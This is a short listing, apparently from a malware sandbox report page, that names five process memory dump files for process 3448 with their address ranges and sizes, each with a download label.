                          • memory/3448-18-0x00007FFBFBB80000-0x00007FFBFC641000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/3448-12-0x00007FFBFBB80000-0x00007FFBFC641000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/3448-17-0x00007FFBFBB80000-0x00007FFBFC641000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/3448-11-0x00007FFBFBB80000-0x00007FFBFC641000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/3448-6-0x000001B7BD7D0000-0x000001B7BD7F2000-memory.dmp

                            Filesize

                            136KB

                            Download